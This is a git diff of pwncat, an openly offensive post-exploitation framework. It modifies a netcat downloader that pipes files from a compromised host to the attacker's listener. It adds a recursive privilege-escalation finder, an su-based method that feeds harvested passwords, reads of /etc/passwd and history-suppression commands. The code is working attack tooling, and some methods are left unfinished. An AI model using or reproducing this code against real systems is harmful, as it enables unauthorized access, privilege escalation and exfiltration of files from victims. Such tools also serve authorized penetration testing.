diff --git a/pwncat/downloader/nc.py b/pwncat/downloader/nc.py index 445d1db..1bc56c1 100644 --- a/pwncat/downloader/nc.py +++ b/pwncat/downloader/nc.py @@ -18,4 +18,4 @@ class NetcatDownloader(RawDownloader): nc = self.pty.which("nc") remote_file = shlex.quote(self.remote_path) - self.pty.run(f"{nc} -q0 {lhost} {lport} < {remote_file}", wait=False) + self.pty.run(f"{nc} -q0 {lhost} {lport} < {remote_file}") diff --git a/pwncat/privesc/__init__.py b/pwncat/privesc/__init__.py index 2e35ddd..1e0bc9b 100644 --- a/pwncat/privesc/__init__.py +++ b/pwncat/privesc/__init__.py @@ -1,36 +1,85 @@ #!/usr/bin/env python3 from typing import Type, List -from pwncat.privesc.base import Privesc, PrivescError -from pwncat.privesc.setuid import SetuidPrivesc +from pwncat.privesc.base import Method, PrivescError, Technique, SuMethod +from pwncat.privesc.setuid import SetuidMethod -all_privescs = [SetuidPrivesc] -privescs = [SetuidPrivesc] +methods = [SetuidMethod] -def get_names() -> List[str]: - """ get the names of all privescs """ - return [d.NAME for d in all_privescs] +class Finder: + """ Locate a privesc chain which ends with the given user. If `depth` is + supplied, stop searching at `depth` techniques. If `depth` is not supplied + or is negative, search until all techniques are exhausted or a chain is + found. If `user` is not provided, depth is forced to `1`, and all methods + to privesc to that user are returned. """ + def __init__(self, pty: "pwncat.pty.PtyHandler"): + """ Create a new privesc finder """ -def find(pty: "pwncat.pty.PtyHandler", hint: str = None) -> Type[Privesc]: - """ Locate an applicable privesc """ + self.pty = pty - if hint is not None: - # Try to return the requested privesc - for d in all_privescs: - if d.NAME != hint: + self.methods: List[Method] = [] + for m in [SetuidMethod, SuMethod]: + try: + m.check(self.pty) + self.methods.append(m()) + except PrivescError: + pass + + def escalate( + self, + target_user: str = None, + depth: int = None, + chain: List[Technique] = [], + starting_user=None, + ): + """ Search for a technique chain which will gain access as the given + user. """ + + current_user = self.pty.current_user + if ( + target_user == current_user["name"] + or current_user["id"] == 0 + or current_user["name"] == "root" + ): + raise PrivescError(f"you are already {current_user['name']}") + + if starting_user is None: + starting_user = current_user + + if len(chain) > depth: + raise PrivescError("max depth reached") + + # Enumerate escalation options for this user + techniques = [] + for method in self.methods: + techniques.extend(method.enumerate()) + + # Escalate directly to the target + for tech in techniques: + if tech.user == target_user: + try: + tech.method.execute(tech) + chain.append(tech) + return chain + except PrivescError: + pass + + # We can't escalate directly to the target. Instead, try recursively + # against other users. + for tech in techniques: + if tech.user == target_user: continue - d.check(pty) - return d + try: + tech.method.execute(tech) + chain.append(tech) + except PrivescError: + continue + try: + return self.escalate(target_user, depth, chain, starting_user) + except PrivescError: + self.pty.run("exit", wait=False) + chain.pop() - raise PrivescError(f"{hint}: no such privesc") - - for d in privescs: - try: - d.check(pty) - return d - except PrivescError: - continue - else: - raise PrivescError("no acceptable privescs found") + raise PrivescError(f"no route to {target_user} found") diff --git a/pwncat/privesc/base.py b/pwncat/privesc/base.py index f77c587..4d96424 100644 --- a/pwncat/privesc/base.py +++ b/pwncat/privesc/base.py @@ -1,5 +1,6 @@ #!/usr/bin/env python3 -from typing import Generator, Callable +from typing import Generator, Callable, List, Any +from dataclasses import dataclass import threading import socket import os @@ -11,9 +12,24 @@ class PrivescError(Exception): """ An error occurred while attempting a privesc technique """ -class Privesc: +@dataclass +class Technique: + # The user that this technique will move to + user: str + # The method that will be used + method: "Method" + # The unique identifier for this method (can be anything, specific to the + # method) + ident: Any + + def __str__(self): + return f"{self.user} via {self.method.name}" + + +class Method: # Binaries which are needed on the remote host for this privesc + name = "unknown" BINARIES = [] @classmethod @@ -21,13 +37,65 @@ class Privesc: """ Check if the given PTY connection can support this privesc """ for binary in cls.BINARIES: if pty.which(binary) is None: - raise DownloadError(f"required remote binary not found: {binary}") + raise PrivescError(f"required remote binary not found: {binary}") def __init__(self, pty: "pwncat.pty.PtyHandler"): self.pty = pty - def execute(self) -> Generator[str, None, None]: - """ Generate the commands needed to send this file back. This is a - generator, which yields strings which will be executed on the remote - host. """ - return + def enumerate(self) -> List[Technique]: + """ Enumerate all possible escalations to the given users """ + raise NotImplementedError("no enumerate method implemented") + + def execute(self, technique: Technique): + """ Execute the given technique to move laterally to the given user. + Raise a PrivescError if there was a problem. """ + raise NotImplementedError("no execute method implemented") + + def __str__(self): + return self.name + + +class SuMethod(Method): + + name = "su" + BINARIES = ["su"] + + def enumerate(self) -> List[Technique]: + + result = [] + current_user = self.pty.whoami() + + for user, info in self.pty.users.items(): + if user == current_user: + continue + if info.get("password") is not None: + result.append(Technique(user=user, method=self, ident=info["password"])) + + return [] + + def execute(self, technique: Technique): + + # Send the su command, and check if it succeeds + self.pty.run(f'su {technique.user} -c "echo good"', wait=False) + + # Read the echo + if self.pty.has_echo: + self.pty.client.recvuntil("\n") + + # Send the password + self.pty.client.sendall(technique.ident.encode("utf-8") + b"\n") + + # Read the echo + if self.pty.has_echo: + self.pty.client.recvuntil("\n") + + # Read the response (either "Authentication failed" or "good") + result = self.pty.client.recvuntil("\n") + if b"failure" in result.lower() or "good" not in result.lower(): + raise PrivescError(f"{technique.user}: invalid password") + + self.pty.run(f"su {technique.user}", wait=False) + self.pty.client.sendall(technique.ident.encode("utf-8") + b"\n") + + if self.pty.whoami() != technique.user: + raise PrivescError(f"{technique} failed (still {self.pty.whoami()})") diff --git a/pwncat/privesc/setuid.py b/pwncat/privesc/setuid.py index 236af3d..08364ad 100644 --- a/pwncat/privesc/setuid.py +++ b/pwncat/privesc/setuid.py @@ -1,5 +1,5 @@ #!/usr/bin/env python3 -from typing import Generator +from typing import Generator, List import shlex import sys from time import sleep @@ -7,7 +7,7 @@ import os from colorama import Fore, Style from pwncat.util import info, success, error, progress, warn -from pwncat.privesc.base import Privesc, PrivescError +from pwncat.privesc.base import Method, PrivescError, Technique # https://gtfobins.github.io/#+suid known_setuid_privescs = { @@ -70,11 +70,14 @@ known_setuid_privescs = { } -class SetuidPrivesc(Privesc): +class SetuidMethod(Method): - NAME = "setuid" + name = "setuid" BINARIES = ["find"] + def enumerate(self) -> List[Technique]: + """ Find all techniques known at this time """ + def execute(self): """ Look for setuid binaries and attempt to run""" diff --git a/pwncat/pty.py b/pwncat/pty.py index 274f031..99c8015 100644 --- a/pwncat/pty.py +++ b/pwncat/pty.py @@ -65,20 +65,18 @@ class RemotePathCompleter(Completer): if path == "": path = "." - # Ensure the directory exists - if self.pty.run(f"test -d {shlex.quote(path)} && echo -n good") != b"good": - return + delim = self.pty.process(f"ls -1 -a {shlex.quote(path)}", delim=True) - files = self.pty.run(f"ls -1 -a {shlex.quote(path)}").decode("utf-8").strip() - files = files.split() - - for name in files: + name = self.pty.recvuntil(b"\n").strip() + while name != delim: + name = name.decode("utf-8") if name.startswith(partial_name): yield Completion( name, start_position=-len(partial_name), display=[("#ff0000", "(remote)"), ("", f" {name}")], ) + name = self.pty.recvuntil(b"\n").strip() class LocalPathCompleter(Completer): @@ -188,6 +186,7 @@ class PtyHandler: self.input = b"" self.lhost = None self.known_binaries = {} + self.known_users = {} self.vars = {"lhost": util.get_ip_addr()} self.remote_prefix = "\\[\\033[01;31m\\](remote)\\033[00m\\]" self.remote_prompt = "\\[\\033[01;32m\\]\\u@\\h\\[\\033[00m\\]:\\[\\033[01;34m\\]\\w\\[\\033[00m\\]\\$" @@ -211,7 +210,7 @@ class PtyHandler: # We should always get a response within 3 seconds... self.client.settimeout(1) - util.info("probing for prompt...", overlay=True) + util.info("probing for prompt...", overlay=False) start = time.time() prompt = b"" try: @@ -223,28 +222,29 @@ class PtyHandler: # We assume if we got data before sending data, there is a prompt if prompt != b"": self.has_prompt = True - util.info(f"found a prompt", overlay=True) + util.info(f"found a prompt", overlay=False) else: self.has_prompt = False - util.info("no prompt observed", overlay=True) + util.info("no prompt observed", overlay=False) # Send commands without a new line, and see if the characters are echoed - util.info("checking for echoing", overlay=True) - self.client.send(b"echo") + util.info("checking for echoing", overlay=False) + test_cmd = b"echo" + self.client.send(test_cmd) response = b"" try: - while len(response) < 7: - response += self.client.recv(7 - len(response)) + while len(response) < len(test_cmd): + response += self.client.recv(len(test_cmd) - len(response)) except socket.timeout: pass - if response == b"echo": + if response == test_cmd: self.has_echo = True - util.info("found input echo", overlay=True) + util.info("found input echo", overlay=False) else: self.has_echo = False - util.info(f"no echo observed", overlay=True) + util.info(f"no echo observed", overlay=False) self.client.send(b"\n") response = self.client.recv(1) @@ -315,6 +315,9 @@ class PtyHandler: # opened) self.run("unset HISTFILE; export HISTCONTROL=ignorespace") + # Disable automatic margins, which fuck up the prompt + self.run("tput rmam") + # Synchronize the terminals util.info("synchronizing terminal state", overlay=True) self.do_sync([]) @@ -715,12 +718,12 @@ class PtyHandler: if delim: if self.has_echo: - self.recvuntil(b"_PWNCAT_ENDDELIM_") # first in command # Recieve line ending from output - self.recvuntil(b"\n") + self.recvuntil(b"_PWNCAT_STARTDELIM_") + self.recvuntil(b"\n", interp=True) - self.recvuntil(b"_PWNCAT_STARTDELIM_") # first in output - self.recvuntil(b"\n") + self.recvuntil(b"_PWNCAT_STARTDELIM_", interp=True) # first in output + self.recvuntil(b"\n", interp=True) return b"_PWNCAT_ENDDELIM_" @@ -791,8 +794,9 @@ class PtyHandler: self.has_cr = True self.has_echo = True self.run(f'export PS1="{self.remote_prefix} $SAVED_PS1"') + self.run(f"tput rmam") - def recvuntil(self, needle: bytes, flags=0): + def recvuntil(self, needle: bytes, flags=0, interp=False): """ Recieve data from the client until the specified string appears """ if isinstance(needle, str): @@ -801,7 +805,15 @@ class PtyHandler: result = b"" while not result.endswith(needle): try: - result += self.client.recv(1, flags) + data = self.client.recv(1, flags) + # Bash sends some **WEIRD** shit and wraps it in backspace + # characters for some reason. When asked, we interpret the + # backspace characters so the response is what we expect. + if interp and data == b"\x08": + if len(result) > 0: + result = result[:-1] + else: + result += data except socket.timeout: continue # force waiting @@ -848,3 +860,37 @@ class PtyHandler: self.download_parser.add_argument("path", help="path to the file to download") self.back_parser = argparse.ArgumentParser(prog="back") + + def whoami(self): + result = self.run("whoami") + return result.strip().decode("utf-8") + + @property + def users(self): + if self.known_users: + return self.known_users + + self.known_users = {} + + passwd = self.run("cat /etc/passwd") + for line in passwd.split("\n"): + line = line.split(":") + user_data = { + "name": line[0], + "password": None, + "uid": int(line[2]), + "gid": int(line[3]), + "description": line[4], + "home": line[5], + "shell": line[6], + } + self.known_users[line[0]] = user_data + + return self.known_users + + @property + def current_user(self): + name = self.whoami() + if name in self.users: + return self.users[name] + return None